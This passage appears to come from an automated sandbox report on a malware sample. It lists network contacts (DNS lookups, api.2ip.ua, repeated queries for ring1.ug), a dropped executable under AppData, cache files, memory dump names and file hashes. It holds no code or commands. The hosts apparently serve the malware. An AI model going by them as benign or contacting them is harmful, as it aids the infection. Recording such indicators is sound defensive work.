| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.139.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 172.67.139.220:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | ring1.ug | udp |
| US | 8.8.8.8:53 | ring1.ug | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ring1.ug | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ring1.ug | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
Files
memory/1792-2-0x0000000006E40000-0x0000000006F5A000-memory.dmp
memory/1792-3-0x0000000000400000-0x0000000000537000-memory.dmp
memory/1792-1-0x0000000006C50000-0x0000000006CEA000-memory.dmp
C:\Users\Admin\AppData\Local\7a476725-87dd-470e-896f-17a56effaee5\starticon3.exe
| MD5 | e8bbb6d921b79101aea7d906a1798f3d |
| SHA1 | 4fd59822cdedd1b194d27d2c01a9cde6222de1bb |
| SHA256 | 7bc2928ce06e7db7bfe0bf3f2c2d2ff9df7f0a8041ea8c593dd0b912c1c3d3fd |
| SHA512 | c525e07c65c7be43aa90568f98253b397919cd0f597b1ba446fed51a578ca1aae4c93fa59e1345b20e3216a676ba35c89c67d6ced6bea68da44a53989fa4d656 |
memory/1792-12-0x0000000000400000-0x0000000004F0E000-memory.dmp
memory/1792-15-0x0000000000400000-0x0000000000537000-memory.dmp
memory/1792-14-0x0000000006E40000-0x0000000006F5A000-memory.dmp
memory/1792-13-0x0000000000400000-0x0000000004F0E000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8
| MD5 | 971c514f84bba0785f80aa1c23edfd79 |
| SHA1 | 732acea710a87530c6b08ecdf32a110d254a54c8 |
| SHA256 | f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895 |
| SHA512 | 43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
| MD5 | a22f82b327418bd0ea2655bf100c2644 |
| SHA1 | 2a4eb460fd63004182c3d3fdace7f9956d00c332 |
| SHA256 | 423220863e53f65b235a8a47157c8d614362ac12f4b4d3bc8f7d3e57dc7e25e2 |
| SHA512 | 2e4995acfebaffdef8f84c0c1049b4a308a21c6a604ea267a4e2cd90ba32f464489195b24abf6a0921419c2c09496a9dd94e7136ed7e03036f60cb2d45201ea4 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12
| MD5 | 67e486b2f148a3fca863728242b6273e |
| SHA1 | 452a84c183d7ea5b7c015b597e94af8eef66d44a |
| SHA256 | facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb |
| SHA512 | d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
| MD5 | bf3fceab2c002dae29619a697cd28f30 |
| SHA1 | dbf6755f5e997f9cf9c490f1df09cc5f99df54ef |
| SHA256 | 55dbe515022ba8cc47b3d2ae70548e85e1cc4b2e73e71e64a716c9bb8ef16b3c |
| SHA512 | 42624112b91e496c619335e9a9db3bdbba8ddc3a9078d46a86d3a11ab2a655f8eb0fad947c367b95a1fb0153f9725e72fcc8d462616af2774d6350c7f3db4281 |
memory/4432-21-0x0000000000400000-0x0000000004F0E000-memory.dmp
memory/4432-22-0x0000000000400000-0x0000000004F0E000-memory.dmp
memory/4432-24-0x0000000000400000-0x0000000004F0E000-memory.dmp
memory/4432-26-0x0000000000400000-0x0000000004F0E000-memory.dmp